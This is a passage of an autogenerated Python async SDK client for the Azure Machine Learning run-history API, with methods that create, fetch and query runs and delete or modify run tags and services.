async def get_by_experiment_name(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_name: str,
**kwargs: Any
    ) -> "_models.Run":
        """Get a run, addressed by experiment name.
        :param subscription_id: The Azure Subscription ID.
        :type subscription_id: str
        :param resource_group_name: The name of the resource group in which the workspace is located.
        :type resource_group_name: str
        :param workspace_name: The name of the workspace.
        :type workspace_name: str
        :param run_id: The identifier of the run.
        :type run_id: str
        :param experiment_name: The name of the experiment that contains the run.
        :type experiment_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_by_experiment_name_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_name=experiment_name,
template_url=self.get_by_experiment_name.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_by_experiment_name.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experiments/{experimentName}/runs/{runId}'} # type: ignore
@distributed_trace_async
async def add_or_modify_by_experiment_id(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_id: str,
body: Optional["_models.CreateRun"] = None,
**kwargs: Any
    ) -> "_models.Run":
        """Create or update a run, addressed by experiment ID.
        :param subscription_id: The Azure Subscription ID.
        :type subscription_id: str
        :param resource_group_name: The name of the resource group in which the workspace is located.
        :type resource_group_name: str
        :param workspace_name: The name of the workspace.
        :type workspace_name: str
        :param run_id: The identifier of the run.
        :type run_id: str
        :param experiment_id: The identifier of the experiment that contains the run.
        :type experiment_id: str
        :param body: The run definition to create or update.
        :type body: ~azure.mgmt.machinelearningservices.models.CreateRun
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'CreateRun')
else:
_json = None
request = build_add_or_modify_by_experiment_id_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_id=experiment_id,
content_type=content_type,
json=_json,
template_url=self.add_or_modify_by_experiment_id.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
add_or_modify_by_experiment_id.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experimentids/{experimentId}/runs/{runId}'} # type: ignore
@distributed_trace_async
async def get_by_experiment_id(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_id: str,
**kwargs: Any
    ) -> "_models.Run":
        """Get a run, addressed by experiment ID.
        :param subscription_id: The Azure Subscription ID.
        :type subscription_id: str
        :param resource_group_name: The name of the resource group in which the workspace is located.
        :type resource_group_name: str
        :param workspace_name: The name of the workspace.
        :type workspace_name: str
        :param run_id: The identifier of the run.
        :type run_id: str
        :param experiment_id: The identifier of the experiment that contains the run.
        :type experiment_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_by_experiment_id_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_id=experiment_id,
template_url=self.get_by_experiment_id.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_by_experiment_id.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experimentids/{experimentId}/runs/{runId}'} # type: ignore
@distributed_trace_async
async def add_or_modify_experiment(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
body: Optional["_models.CreateRun"] = None,
**kwargs: Any
    ) -> "_models.Run":
        """Create or update a run.
        :param subscription_id: The Azure Subscription ID.
        :type subscription_id: str
        :param resource_group_name: The name of the resource group in which the workspace is located.
        :type resource_group_name: str
        :param workspace_name: The name of the workspace.
        :type workspace_name: str
        :param run_id: The identifier of the run.
        :type run_id: str
        :param body: The run definition to create or update.
        :type body: ~azure.mgmt.machinelearningservices.models.CreateRun
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'CreateRun')
else:
_json = None
request = build_add_or_modify_experiment_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
content_type=content_type,
json=_json,
template_url=self.add_or_modify_experiment.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
add_or_modify_experiment.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/runs/{runId}'} # type: ignore
@distributed_trace_async
async def add(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
body: Optional["_models.CreateRun"] = None,
**kwargs: Any
    ) -> "_models.Run":
        """Create a run.
        :param subscription_id: The Azure Subscription ID.
        :type subscription_id: str
        :param resource_group_name: The name of the resource group in which the workspace is located.
        :type resource_group_name: str
        :param workspace_name: The name of the workspace.
        :type workspace_name: str
        :param run_id: The identifier of the run to create.
        :type run_id: str
        :param body: The run definition.
        :type body: ~azure.mgmt.machinelearningservices.models.CreateRun
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'CreateRun')
else:
_json = None
request = build_add_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
content_type=content_type,
json=_json,
template_url=self.add.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
add.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/runs/{runId}'} # type: ignore
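    # Usage sketch for creating a run (illustrative; CreateRun constructor
    # arguments are assumptions that depend on the models package):
    #
    #     run = await runs_op.add(
    #         subscription_id, resource_group_name, workspace_name,
    #         run_id="<new-run-id>",
    #         body=_models.CreateRun(...),
    #     )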
@distributed_trace_async
async def get(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
**kwargs: Any
    ) -> "_models.Run":
        """Get a run.
        :param subscription_id: The Azure Subscription ID.
        :type subscription_id: str
        :param resource_group_name: The name of the resource group in which the workspace is located.
        :type resource_group_name: str
        :param workspace_name: The name of the workspace.
        :type workspace_name: str
        :param run_id: The identifier of the run.
        :type run_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/runs/{runId}'} # type: ignore
@distributed_trace_async
async def delete_tags_by_experiment_id(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_id: str,
body: Optional[List[str]] = None,
**kwargs: Any
    ) -> "_models.Run":
        """Delete tags from a run, addressed by experiment ID.
        :param subscription_id: The Azure Subscription ID.
        :type subscription_id: str
        :param resource_group_name: The name of the resource group in which the workspace is located.
        :type resource_group_name: str
        :param workspace_name: The name of the workspace.
        :type workspace_name: str
        :param run_id: The identifier of the run.
        :type run_id: str
        :param experiment_id: The identifier of the experiment that contains the run.
        :type experiment_id: str
        :param body: The list of tag names to delete from the run.
        :type body: list[str]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, '[str]')
else:
_json = None
request = build_delete_tags_by_experiment_id_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_id=experiment_id,
content_type=content_type,
json=_json,
template_url=self.delete_tags_by_experiment_id.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_tags_by_experiment_id.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experimentids/{experimentId}/runs/{runId}/tags'} # type: ignore
@distributed_trace_async
async def modify_or_delete_tags_by_experiment_id(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_id: str,
body: Optional["_models.DeleteOrModifyTags"] = None,
**kwargs: Any
    ) -> "_models.Run":
        """Modify or delete tags on a run, addressed by experiment ID.
        :param subscription_id: The Azure Subscription ID.
        :type subscription_id: str
        :param resource_group_name: The name of the resource group in which the workspace is located.
        :type resource_group_name: str
        :param workspace_name: The name of the workspace.
        :type workspace_name: str
        :param run_id: The identifier of the run.
        :type run_id: str
        :param experiment_id: The identifier of the experiment that contains the run.
        :type experiment_id: str
        :param body: The tag modifications and deletions to apply.
        :type body: ~azure.mgmt.machinelearningservices.models.DeleteOrModifyTags
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'DeleteOrModifyTags')
else:
_json = None
request = build_modify_or_delete_tags_by_experiment_id_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_id=experiment_id,
content_type=content_type,
json=_json,
template_url=self.modify_or_delete_tags_by_experiment_id.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
modify_or_delete_tags_by_experiment_id.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experimentids/{experimentId}/runs/{runId}/tags'} # type: ignore
@distributed_trace_async
async def delete_tags_by_experiment_name(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_name: str,
body: Optional[List[str]] = None,
**kwargs: Any
    ) -> "_models.Run":
        """Delete tags from a run, addressed by experiment name.
        :param subscription_id: The Azure Subscription ID.
        :type subscription_id: str
        :param resource_group_name: The name of the resource group in which the workspace is located.
        :type resource_group_name: str
        :param workspace_name: The name of the workspace.
        :type workspace_name: str
        :param run_id: The identifier of the run.
        :type run_id: str
        :param experiment_name: The name of the experiment that contains the run.
        :type experiment_name: str
        :param body: The list of tag names to delete from the run.
        :type body: list[str]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, '[str]')
else:
_json = None
request = build_delete_tags_by_experiment_name_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_name=experiment_name,
content_type=content_type,
json=_json,
template_url=self.delete_tags_by_experiment_name.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_tags_by_experiment_name.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experiments/{experimentName}/runs/{runId}/tags'} # type: ignore
@distributed_trace_async
async def modify_or_delete_tags_by_experiment_name(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_name: str,
body: Optional["_models.DeleteOrModifyTags"] = None,
**kwargs: Any
    ) -> "_models.Run":
        """Modify or delete tags on a run, addressed by experiment name.
        :param subscription_id: The Azure Subscription ID.
        :type subscription_id: str
        :param resource_group_name: The name of the resource group in which the workspace is located.
        :type resource_group_name: str
        :param workspace_name: The name of the workspace.
        :type workspace_name: str
        :param run_id: The identifier of the run.
        :type run_id: str
        :param experiment_name: The name of the experiment that contains the run.
        :type experiment_name: str
        :param body: The tag modifications and deletions to apply.
        :type body: ~azure.mgmt.machinelearningservices.models.DeleteOrModifyTags
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'DeleteOrModifyTags')
else:
_json = None
request = build_modify_or_delete_tags_by_experiment_name_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_name=experiment_name,
content_type=content_type,
json=_json,
template_url=self.modify_or_delete_tags_by_experiment_name.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
modify_or_delete_tags_by_experiment_name.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experiments/{experimentName}/runs/{runId}/tags'} # type: ignore
@distributed_trace_async
async def delete_tags(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
body: Optional[List[str]] = None,
**kwargs: Any
    ) -> "_models.Run":
        """Delete tags from a run.
        :param subscription_id: The Azure Subscription ID.
        :type subscription_id: str
        :param resource_group_name: The name of the resource group in which the workspace is located.
        :type resource_group_name: str
        :param workspace_name: The name of the workspace.
        :type workspace_name: str
        :param run_id: The identifier of the run.
        :type run_id: str
        :param body: The list of tag names to delete from the run.
        :type body: list[str]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, '[str]')
else:
_json = None
request = build_delete_tags_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
content_type=content_type,
json=_json,
template_url=self.delete_tags.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_tags.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/runs/{runId}/tags'} # type: ignore
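    # Usage sketch (illustrative): the body is simply the list of tag names to
    # remove from the run.
    #
    #     run = await runs_op.delete_tags(
    #         subscription_id, resource_group_name, workspace_name,
    #         run_id="<run-id>",
    #         body=["obsolete-tag", "temporary-tag"],
    #     )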
@distributed_trace_async
async def delete_run_services_by_experiment_id(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_id: str,
body: Optional["_models.DeleteRunServices"] = None,
**kwargs: Any
    ) -> "_models.Run":
        """Delete services of a run, addressed by experiment ID.
        :param subscription_id: The Azure Subscription ID.
        :type subscription_id: str
        :param resource_group_name: The name of the resource group in which the workspace is located.
        :type resource_group_name: str
        :param workspace_name: The name of the workspace.
        :type workspace_name: str
        :param run_id: The identifier of the run.
        :type run_id: str
        :param experiment_id: The identifier of the experiment that contains the run.
        :type experiment_id: str
        :param body: The run services to delete.
        :type body: ~azure.mgmt.machinelearningservices.models.DeleteRunServices
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'DeleteRunServices')
else:
_json = None
request = build_delete_run_services_by_experiment_id_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_id=experiment_id,
content_type=content_type,
json=_json,
template_url=self.delete_run_services_by_experiment_id.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_run_services_by_experiment_id.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experimentids/{experimentId}/runs/{runId}/services'} # type: ignore
@distributed_trace_async
async def delete_run_services_by_experiment_name(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_name: str,
body: Optional["_models.DeleteRunServices"] = None,
**kwargs: Any
    ) -> "_models.Run":
        """Delete services of a run, addressed by experiment name.
        :param subscription_id: The Azure Subscription ID.
        :type subscription_id: str
        :param resource_group_name: The name of the resource group in which the workspace is located.
        :type resource_group_name: str
        :param workspace_name: The name of the workspace.
        :type workspace_name: str
        :param run_id: The identifier of the run.
        :type run_id: str
        :param experiment_name: The name of the experiment that contains the run.
        :type experiment_name: str
        :param body: The run services to delete.
        :type body: ~azure.mgmt.machinelearningservices.models.DeleteRunServices
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'DeleteRunServices')
else:
_json = None
request = build_delete_run_services_by_experiment_name_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_name=experiment_name,
content_type=content_type,
json=_json,
template_url=self.delete_run_services_by_experiment_name.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_run_services_by_experiment_name.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experiments/{experimentName}/runs/{runId}/services'} # type: ignore
@distributed_trace_async
async def delete_run_services(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
body: Optional["_models.DeleteRunServices"] = None,
**kwargs: Any
    ) -> "_models.Run":
        """Delete services of a run.
        :param subscription_id: The Azure Subscription ID.
        :type subscription_id: str
        :param resource_group_name: The name of the resource group in which the workspace is located.
        :type resource_group_name: str
        :param workspace_name: The name of the workspace.
        :type workspace_name: str
        :param run_id: The identifier of the run.
        :type run_id: str
        :param body: The run services to delete.
        :type body: ~azure.mgmt.machinelearningservices.models.DeleteRunServices
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'DeleteRunServices')
else:
_json = None
request = build_delete_run_services_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
content_type=content_type,
json=_json,
template_url=self.delete_run_services.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_run_services.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/runs/{runId}/services'} # type: ignore
@distributed_trace
def get_by_query_by_experiment_name(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
experiment_name: str,
body: Optional["_models.QueryParams"] = None,
**kwargs: Any
    ) -> AsyncIterable["_models.PaginatedRunList"]:
        """Query runs in an experiment, addressed by experiment name, as a paged collection.
        :param subscription_id: The Azure Subscription ID.
        :type subscription_id: str
        :param resource_group_name: The name of the resource group in which the workspace is located.
        :type resource_group_name: str
        :param workspace_name: The name of the workspace.
        :type workspace_name: str
        :param experiment_name: The name of the experiment to query.
        :type experiment_name: str
        :param body: The query parameters.
        :type body: ~azure.mgmt.machinelearningservices.models.QueryParams
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PaginatedRunList or the result of cls(response)
:rtype:
